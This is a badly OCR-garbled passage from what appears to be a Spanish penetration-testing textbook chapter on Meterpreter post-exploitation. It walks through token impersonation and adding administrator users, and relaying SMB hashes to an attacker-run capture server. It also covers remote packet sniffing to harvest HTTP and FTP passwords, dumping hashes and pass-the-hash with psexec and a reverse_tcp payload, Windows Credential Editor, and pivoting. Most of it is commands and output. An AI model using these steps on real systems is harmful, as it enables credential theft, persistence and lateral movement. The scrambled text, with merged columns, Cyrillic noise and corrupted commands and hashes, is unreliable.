scripts. El módulo espia debe ser visto como un módulo que debe implementar distintas a D 
4 ы » г P 4 е ~ {үз А лүү: Ta! Н £ л И ` 
para realizar capturas de teclado, micrófono, webcam, etcétera. Actualmente, no presenta 
funcionalidades. 


preter/reverse tcp 


КБ. [йр 4.34: Listado de módulos рага la carga en Meferpreler: 
| 
| 


Fig 4.33: Obtención de sesión de Meterpreter mediante la utilización de multi_met 


Multiscript. Este script permite ejecutar distintos scripts en una sola instrucción. La 
sintaxis es idéntica a los anteriores. 


4. Módulos de Meterpreter 


Meterpreter disi 


eterpreter > screengrab -h | | | 
Usage: screengrab <path.jpeg> [view in browser: їгие | false] 
pone de módulos extra que no se encuentran cargados al realizar la explotación. 


Estos módulos añaden comandos a la sesión los cuales proporcionan mayor flexibil 
al auditor en esta fase de post-explotación. 


i i Grab a screenshot of the current interactive desktop. 
idad y potencia 


meterpreter > $ 
Fig 4.35: Ejecución de screengrab sobre máquina vulnerada, 
Cuando se añaden nuevos módulos a Meterpreter se puede utilizar el comando help para conocer 


exactamente qué nuevos comandos lay disponibles en la sesión interactiv 


a del payload. En este 
apartado se estudiarán los siguientes módulos: 


Módulo: Incognito 


e | implifics sho la labor de gestión 
; | опар , ЖЕРЕ, teresantes, ya que simplifica much AN 
< Espia. Este módulo proporciona funcionalidades para realizar capturas de pantalla, El módulo incognito es uno de los más in ide | módulo se debe ejecutar la siguiente 
i | i uncionali : ; de usuarios y la impersonalización de éstos. Para cargar el módulo se | 
- Incognito. Este módulo proporciona funcionalidades con las que el auditor podrá іг 


Е | | е ; ) instrucción load incognito. 
impersonalizando usuarios, e incluso administrar los usuarios reales que existen en la шн а 
máquina vulnerada. 
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0... аа аат ааа а 
Бае 


рсе nda OOO E E eE AA | 
Incognito Commands 


| Command Description 
{ A жыш шә. 
| add_group_user Attempt to add a user to a global group with all tokens 
| ndd_vocalgroup_user Attempt to add a user to a local group with all tokens 
adu user Attempt to add a user with all tokens | 
impersonate_token Impersonate specified token 
LES Tokens List tokens available under current user context 
snart hashes > Snarf challenge/response hashes for every token 
neterpreter > | 
A La O PA льда. { 


Fig 4.36: Comandos aportados por el módulo соз 


; М ` ТЕЕ tf Ss os Жо. з, 1 . 
HI comando add group -user pernute añadir de manera sencilla un usuario de ta máquina vulnerada 
aun grupo global determinado. 


a sintavieo у! + з Н y 
La sintaxis del comando es sencilla: add group_user <nombre grupo> <usuario>, 


Е comando add _localgroup_user permite añadir un usuario a un grupo local determinado. Su 

АТА а) т "fe A М A м ' | 

E e serta, tras la creación de un usuario en la máquina vulnerada, utilizar este comand 

para afadir un usuario al grupo administradores. De est | fa i 

| : | ‚е este modo, ya se tendri 15 ara seuuiy 

ое ш inistra este y entria un usuario рага segui 
{ ч соп tos máximos privilegios en la máquina vulnerada. 


La sintaxis del comando es add _localgroup_user <nombre еғнро> <usuario. 


a ре a Жор ' 

El ы aes User permite la adición de un usuario a la máquina vulnerada, El objetivo es 
НАЗА] 3, hoya “ot rfs н . 
rea mente claro, y consiste en disponer de un usuario en esa máquina del cual se conozcan jas 
credenciales y poder acceder así en cualquier momento, 

La sintaxis de! comando es add_user <usuario> <contraseña> 
БЇ come Т ta 

: ea impersonate_token proporciona la posibilidad de suplantar cualquier token del sistema 
Te ie e e> Вл , Й ©, + х е Е 
* realmente atil para elegir qué usuario o servicio зе quiere ser en un momento dado de la fase 
de post-explotación. La sintaxis es la siguiente: impersonate_token <tokenm>. Donde token está 
ыл. por <nombre maquina>W<usuario o servicio>. Hay que recalcar la doble barra invertida 
para que Meterpreter lo identifique como una sola barra invertida 


meterpreter > getuid 


Server username: NT AUTHORITYASYSTEM | 
meterpreter > Impersonate_token PRUEBAS -91760CC\\hacked 
[+] Delegation token available 


i ' , 
[+] Successfully impersonated USEr PRUEBAS-01760CC\hacked | 


meterpreter > 


ео 4 37 тунек : F, 
Fig 4.57: impersonalizando token con el comando impersonate token del módulo incognito. 


El c a Чер 

о list_tokens permite listar y enumerar Jos 15041108 y grupos que existen en el equipo 
vu ега о. Pa ra listar los usuarios se debe ejecutar la siguiente instrucción list tokens -u, mientras 
que para el listado de los grupos se debe ejecutar esta otra: list tokens —g, Д 
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aterpreter > list tokens -u 


elegation Tokens Available 
HI A dent aaa 
T AUTHORTTY\ servicio de red 
T AUTHORIFY\SERVICIO LOCAL 
IT AUTHORITYA SYSTEM 
RUEBAS-91760CCVhacked 


mpersonation Takens Available 
A tn 


Т AUTHORITY MANONYMOUS LOGON 
terpreter > list_tokens -g 


elegation Tokens Available 
A A A rs 
Todos | 
VILTIM Administradores 
BUILTIN Usuarios 

{Т ANTHORITYA Servicio de red 
Т AUTHORITY SERVICTO LOCAL 
RUEBAS -E1766CCANingano 


Impersonation Tokens Available 


o tankens available 


Fig 4.38: Listando tokens de la máquina vulnerada. 


El comando snarf hashes permite capturar los hashes de sesiones SMB, su sintaxis es snarf hashes 
<host>. . 


PoC: Recuperando hashes SMB con snarf hashes 

En esta prueba de concepto el auditor intentará utilizar snarf_hashes pára provocar el reenvío de les 
йазле a través de una conexión SMB. Para ello el auditor implementará un servidor SMB mediante 
el módulo auxiliarv/server/capture/smb. Este servidor recibirá los hashes del usuario con sesión en 
curso en la máquina remota, 


рори лиги урина киру: ааа: ТҮ 
BSI exploit(mse8_067 netopil > изе auxiliary/server/canture/smb 
asf auxiliaryfemb) > show options 


todule options (auxiliary/server/capture/smb): 


Name Current Setting Required Description 
CAINPWFILE no The local filename to store the hashes in CainsAbel fo 
rmat 
CHALLENGE 1122334455667788 yes The 8 byte challenge 
JOHNPWFILE no The prefix to the local filename to store the hashes i 
JOHN format ч 
1 SRVHOST 6.0.6.9 yes The local host to listen on. This mist be an address о 
t the local machine ог 9.0.9.0 
SRVPORT 445 yss The local port to listen on. 
551. False na Negotiate SSL for incoming connections 
SSLCert no Path to a custom SSL certificate (default is randomly 
enerated) 
SSlVersion 5513 по Specify the version of SSL that should be used (accept 


0: 5512, 5513, TLS1) 
Fig 4.39: Configuración del módulo auxiliary/server/capture/smb. 
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Es importante configurar el módulo correctamente, ya que en caso contrario по se podrán obtener las 


ү Н jel , , i А А Command Description 

кош de esta forma. El servidor dispone de unas opciones interesantes como son la creación 22 ОРТ ыыы 

£ И H М rra o HA . К Ў а р E rj e б 

5 a er a pe herramientas como Cain, y uno de los más famosos crackeadores John the ripper. а сараана 

in jahe ` х > > 2 У, р $ é = Р Е В 

a prueba de concepto se configura para que se capluren los hashes y además se creen archivos | sniffer_release Free captured packets on a specific interface instead of downloading the 

compatibles con estas herramientas para su posible crackeo más adelante. jm | КТАР \ 
| sniffer start Start packet capture on a specific interface ` 
sniffer_stats View statistics of an active capture 

auxiliary(smb) > set CAINPWFILE /root/cain. сар [| sniffer stop Stop packet capture on a specific intertace 2. А | 


ms 
CAINPWFILE => /root/cain. cap 
sf auxiliary{smb}) > set JOHNPREYLE froct/john.cap 
JOHNPWFILE => /root/john. cap 


así auxiliary(smb) > set SRYHOST 132.158.08.60 
SRYHOST => 192.168.8,60 
57 aúxiliary(smb) > run 


| Fig 4,42: Listado de comandos que proporciona el módulo sniffer de Meterprete»: 

| 
+] Auxiliary module execution с ; _. да : КОК | 
vary modyle execution completed El comando suijfer_siart arranca un seiffer en la máquina vulnerable y permite obtener todo el 


El camando srifjer_ interfaces especifica mediante un identificador los adaptadores de red disponibles 
en la máquina vulnerada. Tras la ejecución del comando se obtiene un listado con los adaptadores, 


[*] Server started. 
asf auxiliary(smb) > sessions -i 2 
(*] Starting interaction with 2... 


tráfico de red que pasa por dicha interfaz en la máquina remota. La sintaxis es sencilla: sniffer_star 
< interfaz de red> <buffer>, donde buffer puede ser un número de | a 200.000. 


El comando si/fer_stop permite detener el sniffer еп la máquina remota, pero la información que 
se encuentra en el buffer по se pierde. Ahora el auditor debería elegir entre descargar lo capturado о 
Una vez se configura el servidor SMB se debe volvera la sesión de Meterpreter donde se ejecuta el liberar el buffer. La sintaxis es sencilla: sni/fer_stop <interfaz de red>. 

comando srarf_hashes, siempre y cuando el módulo incognito se encuentre cargado. El comando | 


о se debe ejecutar apuntando а la dirección 1P dónde se debe enviar la información con 
os hashes. | 


Fig 4.40; Ejecución del módulo auxiliuryiserver/capture/smb. 


El comando snif/er_clump permite descargar el contenido del buffer, es decir las capiuras que se han 
realizado, a un fichero PCAP., Esta utilidad es realmente interesante y se puede lograr información 
valiosa a través de ella. La sintaxis es la siguiente: smiffer_dump <interfaz de red> <nombre archivo 


meterpreter > snarf hashes 192.168.0.60 РСАР>. 
[*] Snarfing token hashes... | р 

| | meterpreter > sniffer dump 1 мее.рсар poo 
[+] SMB Captured - 2812-08-31 12:36:10 +0200 | | (+1 Flushing packet capture buffer for interface 1... | 
ү, е рие from 192.168.0.59:1107 - 192.168.0.59 | рн е ЕЕ. 

:hacke :PRUEBAS-01766CC 0S:Windows 2002 Service Pack 3 2600 LM:Hind y ү Яки 
n 78366c3e4b835a3a16ece91cd6f248402f85252cc731bb25 E и ЕНИ куны 
:504е9 0f39 $ 
е9с49500739#3960с9а24аай7с9Ь71сЬ7а09893#64#6Ь meterpreter > Y 

[*] Done. Check sniffer logs | Fig 4.43: Descarga del contenido de! buffer del sniffer configurado en la máquina vulnerada. 


meterpreter > 


Ei comando sni/fer_release permite eliminar el contenido del buffer de la máquina vulnerada.. La 


Fig 4.41: Obtención de hashes sobre el usuario con la sesión en curso. ! 
sintaxis es la siguiente: sniffer_ release <interfaz de red>. 


Módulo: Sniffer El comando sniffer_stats proporciona la posibilidad de visualizar las estadisticas de la interfaz 
es | Е л seleccionada. Con este comando se puede visualizar información como el número de paqueles 

e moato; cio! 5 de red a la maquina vulnerada. El auditor podrá realizar capturas capturados, y el tamaño de la captura. La sintaxis de este comando es, similar a las anteriores: 
de red a través de la máquina remota. Además, se podrán gestionar las interfaces y conocer mejor de | 
esta manera el entorno de la red en la que se encuentra la máquina vulnerada. Un ejemplo interesante 
es la posibilidad de que dicha máquina vulnerada disponga de varias interfaces, e incluso, que esté 


sniffer_stats <interfaz de red>. 


a un segmento de red, a la que a priori, el auditor no tenga conectividad. De este modo, PoC: Espiando la red de la victima 
se puede llegar a segment ү | la Б , б p sado * А , 
| Биг а segmentos de гей que antes по se podía, El módulo sniffer Пепе una serie de En esta prueba de concepto se utilizará el módulo sniffer para realizar capturas de tráfico de la red 


comandos, tal y como se puede ver en la im: : А ТОЕ 
р) Р ВИК } donde se encuentra la máquina vulnerada. Después, se procederá a realizar un análisis de la captura 
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de tráfico para poder visualizar información interesante, como por ejemplo, cookies, credenciales de 
protocolos no seguros, archivos mediante su reconstrucción, etcétera, 


LI punto de partida es una sesión de Meterpreter la cual el auditor ha obtenido una vez que ha 
realizado la esplotación en la fase previa. А continuación se detallan las máquinas y los roles de esto 


escenario: 


+ 


-PI auditor dispone de una máquina con BackTrack 5. 
La máquina vulnerada ejecuta un sistema operativo Windows ХР SP3. 


-El usuario víctima realizará conexiones a Varias páginas de Internet. Además, inleniará 
loguearse en un servicio de FTP. 


En primer lugar el auditor ejecuta el comando load sniffer, para cargar dicho módulo en la sesión 
de Meterpreter. Después, ejecuta el comando sniffer_interfaces para comprobar qué interfaces 
hay disponibles en la máquina vulnerada, Generalmente, se encontrará con una ínica interfaz con 
conexión a una red, pero риеве haber sorpresas y encontrarse una máquina con varias interfaces, 
cada una a un segmenío distinto de red. 


Tras listar las interfaces de red, se debe lanzar el sniffer en la máquina vulnerada. Para ello, se 


ejecuta la siguiente instrucción: saiffer_start <interfaz de red>. En estos momentos todo е! tráfico 
que pasa por la máquina vulnerada está siendo capturado en remoto, 


e, 


meterpreter > sniffer stari 1 1858000 
[+] Capture started on interface 1 (188099 packet buffer) 
mezerpreter > sniffer_stats i 
¡-] Usage: sniffer stats [interface-id] 
meterpreter > sniffer stats 1 | 
[+] Capture statistics far interface 1 
packets: 6 
bytes: 0 
meterpreter > sniffer stats 1 
[+] Capture statistics far interface 1 
packets: 423 
bytes: 269734 


meterpreter > 


Fig 4.44: Ejecución del sniffer en temoto. 


tl 


En este instante el auditor debe esperar un tiempo a que la víctima genere suficiente tráfico interesante. 
Puede ser que la muestra que el auditor recoja no tenga información sensible о comprometedora, 
pero sí 10 sirve para entender y conocer todos las protocolos que se están utilizando en esa red, 


Después de esperar un tiempo, se procede a la detención del sniffer y a la descarga del archivo 
PCAP que se genera por el tráfico de la red. En realidad, no es imprescindible detener el sniffer, se 
puede descargar el archivo PCAP y seguir capturando tráfico. Este hecho es interesante para poder 
segmentar todo el tráfico en distintos ficheros. 


Una vez que se dispone del archivo PCAP en la máquina del auditor se procede a su análisis. En esta 
prueba de concepto se buscará tráfico НТТР, FTP y alguna imagen que la víctima haya visualizado. 
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Para ello, se utilizará la herramienta Wireshark, aunque existen otras herramientas que automatizar 
Y * 2 J! A 
е] proceso de búsqueda de esta información. 


[neterpreter > sniffer_stop ї 


f+] Capture stopped on interface 1 КУ 
[+] There аге 2458 packets (1582828 bytes) remainino e | | 
[+] Downivad or release them тШ кешр: or *sniffer_release 
meteroreter > sniffer_dump metesploi ‚рсар 

a в кле ea 

еїегрггіег > sniffer dump 1 метаѕр „сер | 

“Т ОЛ packet capture buffer for interface 1... 

[#] Flushed 2458 packets (1631988 bytes) 
11+] Downloaded 032% (524280/1631988)... 
[1+] Downloaded 064% (1949576/1631988)... 
|[+] pownleaded 095% {1572864/1631988)... 

[*] Downloaded 100% (1631988/1031988)... 

Lt] Downicad completed, converting to PCAP... 

f+] PEAP file written to metasploit.pcap 
acteroreter > 

O O A A AN 


Fig 4.45: Parada del sniffer y descarga del archivo PCAP resultante. 


{ А | УА, 4 str УЯ st; ^ s $ A lej 
Se procede a la apertura de la aplicación Wireshark y el archivo PCAP, Se utilizarán los 2. e Ч 
| ia! Н 7 Ta ч а ba ar Ме л У - 4 
Wireshark para realizar las búsquedas de la información interesante, en este caso el tráfico HTT у 
го aplicado será “HIT ains “password”” есіаг e: m único 
filtro aplicado será “HTTP contains “password””, y se puede apreciat ma se filtra он A u A 
| е Isualizar сот есе { traseña y el usuario en texto | . 
paquete. En la imagen se puede visualizar como aparece ia contraseña y ¿ р 


ERAS SNE Na AE 
ШИ ЕЕН http contains "password", 
À q і 7 EEIN нба ж аад. 


БЕК Лиу 


утта ту 


= 


ета3\Аййгезв=шетазр1о11%@Т1ибраззмогй=12ЗаБс, 
Fig 4.46: Búsqueda de credenciales en HTTP a través del archivo PCAP, 


A continuación se realizará la misma acción con credenciales de FTP y la búsqueda de imágenes. En, 
primer lugar el filtro para el protocolo FTP es “FTP contains PASS”, también sería válido el filtro 


“FTP contains USER” para la búsqueda de usuarios, 
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Е ¡Frame 2372 67: byte tes captired: 
[H Ethernet. 11, Sre h7if2:08):7.08 
ИЕ ч "9 Н. 


(žl. Internet; Prótoğ 
El Transmission Control. 
Ее Transter: Proto 
lal PASS 123abe\r\n 
Request command: PASS 
Request arg: 123abc 


35), 0s 


Fig 4,47: Búsqueda de credenciales en FTP a través del archivo PCAP, 


PER e А 
sal a la búsq uedä de imágenes, por e Jemplo G}F, existen filtros. El filtro que se utiliza para capturár o 
recoger las imágenes es image-gif”. Una vez que se encuentre la in 


| nagen deseada se puede exportar 
а bytes, donde el usuario deberá elegir la extensión que se quiere dar al archivo, tal y como puede 
visualizarse en la imagen. 


Export Selected Packet que 
А 45 


Wiki Биос Pare 


Screen width: 30 

Screen height: 150 E! 
Global settings: (Global color table present) (7 

Background color index: 255 | 


Global color map: f5da8Bbfcebe9686a699594956783h 


=> A 


Fig 4.48: Búsqueda de imágenes y exportación, 
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5. Pass the hash 


Hoy en día, las empresas. y grandes organizaciones utilizan la misma técnica para recordar las 
credenciales y la repetición de éstas. Es realmente interesante observar como en un departamento 
con muchas máquinas, la cuenta de administrador tiene unas credenciales iguales en todas ellas. 
¿Por qué se repiten? Es fácilmente entendible que si se disponen de 1000 máquinas, proporcionar 
1000 contraseñas de administrador distintas y poder llevar un inventario no sería (area sencilla. 
También hay que visualizar la otra parte del asunto y es que sería viable utilizar distinias cuentas 
de administrador en función del departamento, por ejemplo. Otra acción по recomendable sería 
asignar cuentas de admin istrador,con contraseña ascendente. En definitiva es un problema complejo, 
y una de las soluciones más utilizadas es la asignación de credenciales administrativas distintas por 
departamento, con un responsable sobre dicha credencial. 


Pass the hash o “impersonalización de usuarios” proporciona al auditor la posibilidad de conociendo 
el hash de la contraseña de un usuario acceder a los recursos Че otras máquinas con la identidad de 
dicho usuario. Lógicamente, para acceder a dichos recursos el usuario debe tener permisos en dichas 
máquinas, pero сото se ha comentado anteriormente, si se vulnera una máquina y se obtiene el 
hash del usuario administrador es muy probable que se pueda acceder a otras máquinas, ya que los 
administradores de dichas máquinas suelen tener la misma credencial. 


Muchos administradores piensan que fortificando su credencial con alfanuméricos y gran longitud de 
caracteres se evita un crackeo del hash. Este hecho es prácticamente cierto, ya que realizar cracking 
de una contraseña con alfanuméricos y gran longitud podría llevar bastante tiempo. Aunque más 
adelante se estudiará que en realidad depende del formato del hash. 


En definitiva, la impersonalización persigue la manipulación de los datos de autenticación en un 
sistema operativo Windows, con el fin de acceder a otras máquinas que dispongan de un mismo 
usuario con un mismo hash, es decir la misma contraseña, que en la máquina de la que se parte. 
Un ejemplo en una auditoría sería, tras la vulneración de una máquina en la fase de explotación, 
conseguir los hashes y usuarios de dicha máquina, por ejemplo el de administrador. En este punto se 
puede intentar impersonalizar los usuarios o el usuario contra otras máquinas que se encuentren en 
la red de la empresa. Mediante esta técnica también se puede impersonalizar usuarios de.un dominio, 
e intentar llegar al administrador del dominio. 


Es interesante obtener el hash de un administrador porque se podrán utilizar recursos como 
С$, admin$, etcétera. Por otro lado, también se pueden utilizar herramientas comu PSTools de 
Sysinternals para ejecutar procesos en remoto con dichas credenciales, por ejemplo, una Лей. 


Teoría de credenciales Windows 

Las contraseñas en Windows se encuentran almacenadas en un fichero denominado SAM en la ruta 
¿owindirZilsystem32Iconfig. En este fichero se almacenan las contraseñas cifradas con una función 
hash unidireccional. Este hecho implica que una contraseña en texto plano se convierta en un cifrado 
o hash, pero el proceso inverso no existe por lo que no es posible descifrar la contraseña. ¿Realmente 
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no se puede descifrar? La respuesta es no, pero sí que es factible realizar comprobaciones hasla 
encontrar la contraseña, es decir un proceso de fuerza bruta. Se pueden ir creando palabras en texto 
plano, pasarlas mediante la función hash a su equivalente cifrado y comprobar si el resultado es 
igual al que está almacenado en el fichero SAM. Si ej resultado de la comparación fuese idéntico se 
habría descubierto el valor en texto plano de la contraseña cifrada. 


La estructura del fichero SAM se compone de la cuenta de usuario, el identificador de éste y de las 
dos versiones de hash de los sistemas Windows, LM y NTLM. 


Lan Manager (LM) 

Es el primer hash de los sistemas Windows para almacenar las credenciales en un fichero y fue 
introducido en versiones previas a Windows NT. Este algoritmo de cifrado está considerado obsoleto 
y no seguro, y sólo se implementa en los sistemas modernos por temas de compatibilidad con los 
sistemas Operativos antiguos. 


El funcionamiento de LM, e implícitamente su debilidad, se detallan а continiación: 
- La contraseña ASCH del usuario se convierte a mayúsculas. 
- Esta contraseña utiliza 14 bytes. 
- Га longitud fija de esta contraseña se divide еп dos bloques de 7 bytes, 
- Se cifra con DES los dos bloques, creando dos bloques de 7 bytes cifrados. 


- Se convierten los bytes en un flujo de bits y se inserta un bit nulo después de cada 7 bits, 
generando los 64 bits necesarios para una clave DES, pero sólo 56 hits de éstos son necesarios 


- El modo de cifrado de DES es configurado en ECB y el padding es mulo, 


- Гоз dos bloques cifrados son concatenados dando lugar a 16 bytes del hash LM. 


Hay que recalcar las debilidades en este proceso. El máximo valor de caracteres que puede tener una 
clave y su posterior cifrado LM son de 14 Caracteres, pero como se ha mencionado anteriormente, 
la contraseña se divide en dos bloques cifrados independientes. Este hecho hace pensar que se 
puede realizar un proceso de fuerza bruta sobre una contraseña de 7 caracteres, lo cuai simplifica 
mucho dicho proceso, sabre todo referente a] tiempo. Incluso hay más detalles negativos acerca del 
algoritmo, como es que, al principio la contraseña del usuario es convertida a mayúsculas lo cual 
implica que el charset o espacio de caracteres posible disminuye considerablemente. 


NTLM 

Es el sucesor de LM, proporciona mayor robustez y seguridad que el protocolo de antenticación LM, 
NTLM dispone de una evolución como es NTLMv2 el cual se introdujo en Windows NT 4.0 SP4, 
compatible de forma nativa con Windows 2000 mejorando la seguridad de NTLM. Se consiguió 
endurecer el protocolo contra ataques de suplantación y se añadió la posibilidad de utilizar un 
servidor para autenticar al cliente, | 


PoC: Llegando más lejos gracias a la suplantación de identidades 
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El proceso de cracking de este tipo de protocolo de autenticación provoca Un anmento exponenci 


dei tiempo, sobretodo si se utilizan más de 8 caracteres, mezclando mayúsculas, minúsculas, 
números y caracteres especiales. | | 


1 
Funcionamiento de la validación de credenciales | 
Las credenciales se encuentran en memoria, hay que recordar que ja contraseña nunca se encuentra 
en texto plano y sí en formato hash, o en algunos casos en una codificación sencilla, Las credencialed 
son almacenadas en el proceso LSASS.EXE, este proceso se encatga de administrar la autenticación 
de deminios de autoridad de seguridad loca! y el directorio activo, Para un proceso de suplantación 
de identidad se quiere sustituir las credenciales en memoria por las que interesa suplantar. 
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En la fase de inicio de sesión interactivo, el proceso WINLOGON.EXE es el encargado de interceptar 
el procese de validación del teclado. El anterior proceso le devuelve a LSA el procedimiento de 
validación. Cuando se valida al usuario se produce la invocación de ESALogonUser para autenticar 
еп ta base de datos SAM (local o remota), permitiendo crear la sesión si se autenticó correctamente. 
Esta información será utilizada por LAN Manager y otros servicios cuando el usuario intente accede 


и recursos remotos, objetos locales y al utilizar sus privilegios, 


El escenario que se propone en esta prueba de concepto es el de un auditor que se encuentra en la 
fase de post-explotación, ya que ha conseguido acceso a una máquina de la fed de una empresa que 
está auditando. La máquina vulnerada no es una máquina, aparentemente, relevante, pero al parecer. 


- varios de los usuarios que se encuentran en dicha máquina también existen.en otras máquinas de la 


red. А continuación se dan más detalles del escenario: 
- El auditor dispone de una máquina con BackTrack 5. EA 
- Га máquina vulnerada рог el auditor tiene como sistema operativo Windows ХР SP3, 
- La máquina a la que se quiere acceder es un Windows 7, 
El punto de partida es la sesión de Meterpreter que tiene el auditor en la máquina vulnerada Windows 


ХР 5Р3. Mediante el uso del comando hashdump se puede obtener el listado de usuarios con los 
hashes LM y NTLM. | | 


meterpreter > hashdump 
Aúministrador:500:8735172c3a77d2c680d39435b51494ee:512b99909997c3b5588cafacgcoaeo60: :; | 
Asistente de ayuda: 1090:317dd0337ea2d549dc6743cd7ee77792:elec1bc581F420f3009570442879968d: :: 
hacked: 1005:8735172c327742c63043b435b51404ee:512b99999997c3b5588cafac9cgae969; :: 


Jose: 1094:3735172c3a77d2c6aad3b435b51494ee:512b99009997c3b5588cafacgc0aegBD: +, 
pepe: 1003:8735 172c3477d2c68ad3h435h51404ee:512b99009997c3b5588cafacgcOae969: 21 : 
SUPPORT_38894520:1002:a8d3b435b51404eeaad30435051404eei3cb0da961c4388978ebcc9449e725984: ‹ 
meterpreter > @ { 


Fig 4.49: Obtención de los usuarios y hashes mediante una sesión de Meterpreter 
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En la imagen se puede visualizar como los hashes de los usuarios administrador, hacked o pepe sou 
idénticos. ¿Por qué ocurre esto? Es sencillo, las contraseñas de esos usuarios en texto plano son las 
'mismas. Otra de las debilidades de estos algoritmos es que no utilizan semilla o challenge que hagan 
que la misma contraseña tenga distinto hash. 


Маа ruta del exploit para impersonalizar se encuentra en exploithvindows/smb/psexec, Este módulo 
plispone de las variables que se especifican a continuación: 


Q_I_ A 
| Variable Descripción | 


RHOST Dirección 1Р de la máquina a la que se quiere conectar para impersonalizar un 
usuario. 


SHARE 
SMBDomain | Dominio para la autenticación. 


SMBPass Password en formato hash <LMHASH>:<NTLMHASH> | 


Recurso al que se quiere conectar, ; | 


SMBUser Usuario al que se quiere impersonalizar. 


Tabla 4.04: Variables del módulo exploil/windows/smb/psexec. 


EEE RTS ATA 
Module options (exploit/windows/smb/psexec): 

Name Current Setting Required Description 

RHOST yes The terget address 

RPORT 445 yes Set the SMB service port 

SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMINS, | 
C$,...) or a normal read/write folder share | 

SHBDomain WORKGROUP no The Windows domain to use for authentication П 

ЅМВРаѕ5 no The password for the specified username 

sHBUser no The username to authenticate as 


Exploit target: 


Id Name 


Ə Automatic 


msf exploit(psexecj > set RHOST 192. 168.1. 37 

RHOST => 192,168.1.37 

msf exploit(psexec) > set SMBPass 8735172c3a77d2c6aad3h435b51404ee:512b99009997c3b558Bcafac9cUa 
е969 

SMBPass => 8735172с3а772сбаа3435051404ее: 512099009997с305588саЃас9сдае969 

msf exploit(psexec) > set SMBUser administrador 

síBUser => administrador 

msi exploitípsexec) > 


Fig 4.50: Configuración del módulo exploitAvindows/smb/psexec. 


Se puede configurar, mediante la variable PAYLOAD, un payload distinto que Meterpreter, pero 
para esta prueba de concepto se utilizará windows/meterpreter/reverse_tcp. Si no se especifica 
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payload, automáticamente se inyectará Meterpreter. Tras obtener una suplantación de йе 
automáticamente se ejecuta е] payload en la máquina remota. i 


+ 


msi exploit(psexec) > exploit ранае 


+] Started reverse handler оп 192,169.1.40:4444 y 
К Cemnecting to the server... | 
[+] Authenticating їс 192.168.1.41:445]WORKGROUP as user *Administrador'.. | 
{#] Uploading payload.. | 
|12 Created \нМ]ВЧРАМ, ехе. 
{*] Binding to 367abb8l- 9844- 35f1-ad32-98f9038901003:2.88ncacn пр: 192.168,1. a | 
{*1 Bound te 367abb81-9844-35f1-ad32-98f0389919803:2.0Gncacn_np:192.168.1.41[Asvccti) , 
[+] Obtaining a service manager handle... | 
it} Creating а new service (GnfcKeMF - "HekeYdzMASTOULPA") ... | 
[*1 Closing service handle.. | 
iie] Opening service... 
[=] Starting the service.. 
|+) Removing the service... 
f+] closing service handle... 
[®] Deleting WwjBgPaW. exe... 
[+] Sending stage (752128 bytes) to 192.168.1.47 
[+] Meterpreter session 7 орев d (192.168.1.40:4444 -> 192.168.1.41:49159) at 2912-08-31 19. 04: 
3 +8260 
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meterpreter > 


Fig 4.51: Suplantación de usuario e inyección de payload en la máquina remota. 


WCE: Windows Credential Editor 
La aplicación Windows Credential Editor permite, entre otras ópciones, suplantar en memoria 
la identidad del usuario. La aplicación se puede descargar desde la siguiente URL http. Mn 
ampliasecurity.com/research.htm!. Una vez que se dispone del listado de usuarios y hashes se Pueden 
impersonalizar gracias a esta herramienta. El usuario suplantará en su máquina local al Usuario que 
requiera, para después conectar con la máquina remota automáticamente con las credenciales de] 
suplantado. 


La aplicación presenta interesantes opciones, las cuales se enumeran en la siguiente tabla: 


Lista las sesiones abiertas por Logon en el sistema. 


Lista las sesiones abiertas y credenciales. Además, refresca cada 5 
segundos. 


Parámetro Descripción 
е Sustituye las credenciales de la sesión en curso. 
Elimina las credenciales de una sesión. 


-i Especifica el LUID. 
-C Ejecuta una CMD con las credenciales Y icas. 


Tabla 4.05: Parámetros de la aplicación Windows Credential Editor. 
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En la imagen se puede visualizar como utilizando una máquina Windows, el auditor puede cambiar 
las credenciales con las que está logueado, con el objetivo de que cuando se conecte con otra máquina 
que tenga un usuario con las mismas credenciales se autentique correctamente, sin necesidad de 
conocer la contraseña, 
ccumente and. SettinasspeperEscritoriosuce- v1.2 2u00 exe тз fdninistrador ice” 
| /177D2C60AD3B435R514B45E:512B9960999703B5588CAFACICOARI69 Е 
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Fig 4.52: Suplantación de credenciales en memoria con Windows Credential Editor. 


Por ejemplo se puede ejecutar la orden W<dirección ІР> o W<dirección IPAC$, donde la dirección IP 
es la máquina objetivo y si las credenciales de los usuarios son iguales, automáticamente se accederá 
al recurso, 
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Fig 4.53: Acceso a recursos de máquina remota con el usuario suplantado. | 


Capitulo ТУ Meterpreter & Post-Explotation 


PSTools de Sysinternals y 

La suite PSTools de Sysinternals proporciona un conjunto de herramientas que permiten pl 
administración de sistemas Windows. Este kit se puede descargar de la siguiente URL htip://techneÑl 
microsofi.com/es-es/sysinternals/bb896649.aspx. 4 


\ 
\ 


Si desde Meterpreter se sube alguna de estas herramientas a la máquina remota, puede sucede 
que si dicha máquina dispone de una solución antivirus, se alerte al usuario víctima de una posible 
amenaza. Algunas de las aplicaciones de PSTools son calificadas de malware de administración 
remota. 
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Fig 4.54: Ejecución de una sheli remota mediante psexec y la suplantación de credenciales. 


Á continuación se enumeran algunas herramientas que proporcionan PSTools y sus útiles 
funcionalidades: 


- Р5Ехес. Ejecuta procesos de forma remote. Interesante para una vez suplantadas las 
credenciales en la memoria del equipo local, ejecutar una skell en la máquina remota. 


~ PSFile. Muestra los archivos abiertos en el equipo remoto. 
-  PSInfe. Muestra información sobre el equipo remoto. 
- РКИ, Elimina procesos de la máquina remota a través del PID o nombre del proceso, 


-  PSList. Muestra información sobre los procesos que están en ejecución en la máquina 
remota. 


- PSLoggedOn. Muestra quién ha iniciado sesión de manera local o a través de recursos 
compartidos, incluyendo el origen de la conexión, | 


~ Р5Раѕкиї Permite cambiar la contraseña de la cuenta. 


-  PSShutdown. Permite apagar y reiniciar la máquina remota. 
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9. Pivoting 


Esta técnica ayuda al auditor a llegar a máquinas de la organización a las que a priori no tiene 

conectividad. Una vez que se dispone de una máquina vulnerada, ésta puede abrir la puerta a otras 
que, por alguna razón, no tienen conectividad con la máquina del auditor. En definitiva el pivoting 
_ ayuda al auditor a intentar ganar acceso a máquinas con las que no se tiene conectividad directa, pero 
"sí a través de otra máquina vulnerada previamente. 


En algunos casos, también se define como pivoting la posibilidad de utilizar la técnica de Pass the 
hash para realizar pivoting, aunque se tenga conectividad con la máquina obietivo. Como se explicó 
anteriormente, puede que la máquina vulnerable y la máquina objetivo compartan algún tipo de 
credencial о hash, y si se vulnera una máquina, se puede utilizar dicha información para acceder а 
la máquina objetivo. 


